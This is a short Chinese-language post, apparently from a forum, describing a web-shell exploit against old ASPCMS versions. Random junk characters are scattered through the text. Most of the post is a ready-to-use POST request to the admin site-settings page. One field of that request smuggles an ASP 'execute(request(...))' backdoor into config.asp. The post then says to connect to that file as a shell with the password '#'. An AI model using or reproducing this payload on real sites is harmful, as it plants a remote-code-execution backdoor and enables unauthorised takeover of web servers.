老的ASPCMS版本的秒杀拿SHELL漏洞
0 }/ c7 z- n4 d, R3 ?/ x& E. `
" s2 ^5 ~( Y; @" B! L4 f 找到后台。。。然后
?1 w' e6 R, w' |) @& v7 M , [0 \- B5 b# \2 ]+ O5 B
/admin/_system/AspCms_SiteSetting.asp?action=saves; S% i8 H+ o; R9 I! ~
% @' e5 ~ x5 {+ Y直接POST
( M9 v4 Y5 Y" g- d$ M
4 C7 I( J! j( c- ErunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1" N: B1 [ Q; \0 G. [
5 q9 l. W7 X' w
再连接配置文件config.asp 密码为#
1 B* E( z1 r: Y; p6 Q/ t* r |